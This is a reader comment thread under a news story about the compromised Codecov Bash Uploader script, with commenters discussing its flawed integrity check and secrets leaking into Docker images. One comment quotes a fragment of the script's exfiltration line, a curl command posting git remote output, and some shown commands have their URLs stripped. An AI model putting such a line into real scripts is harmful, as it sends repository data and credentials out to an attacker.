back to article Codecov dev tool warns of stolen credentials from compromised script, undiscovered for two months

Codecov, makers of a code coverage tool used by over 29,000 customers, has warned that a compromised script may have stolen credentials over a period of two months, before it was discovered a few weeks ago. Code coverage measures how much of an application’s code is the subject of unit tests, the idea being that the higher the …

  1. A random security guy Bronze badge

    Flawed integrity check of a bash script can be hacked

    The Codecov integrity check itself can be hacked because the version string extracted from the shell file is neither properly quoted nor validated. Here is the proper Twitter reference:

    What we know is the LAST file. There were many changes to the hacked file so we don't know what else the script could have done.

    I was able to do a few more things with the flawed integrity check described at

    curl -s > codecov;

    VERSION=$(grep 'VERSION=\".*\"' codecov | cut -d'"' -f2);

    for i in 1 256 512


    shasum -a $i -c --ignore-missing <(curl -s${VERSION}/SHA${i}SUM)


  2. Robert Carnegie Silver badge

    When you say

    curl -sm 0.5 -d “$(git remote -v)

    Do you mean

    curl -sm 0.5 -d "$(git remote -v)

    Asking for a friend :-)

    1. A random security guy Bronze badge

      Additional character extra

  3. Anonymous Coward
    Anonymous Coward

    > an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

    I guess this means a developer copied a secret key to the docker image during development and they didn't use key-file detection software as a final step before release. Like Boeing leaving tools in the aircraft body.

    1. A random security guy Bronze badge

      The usual answer I get from developers is: How ill anyone even know I have a key hidden in the binary? You can't expect them to run the software through a filter. I have one case where the key is compiled into the firmware and is present in the source code in GitHub but doesn't use GitHub secrets.

      1. claimed

        Amazon released git secrets, which is absolutely brilliant if you're an old school developer who actually checks out to a local repository, etc

        Most 'developers' I see are clicking about in github and don't really know what they're doing. Call me old fashioned, but uploading secrets so that they can be detected rather defeats the point.

  4. FlamingDeath Silver badge


    short version:

    We built a structure, and the structure hit us in the face.


  5. Pascal Monett Silver badge

    "Protecting secrets during development is a tough problem"


    The only thing you need to do is not hook your internal code to someone else's code repository.

    It's the cancer of today's attitude regarding the Internet : I'll just link that bit of code to my project, what's the worst that can happen ?

    Well this.

    Take that code inside, check it out and make sure it does what it says.

    But of course, to do that you have be an actual programmer, not just a muppet stringing other people's work together.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2021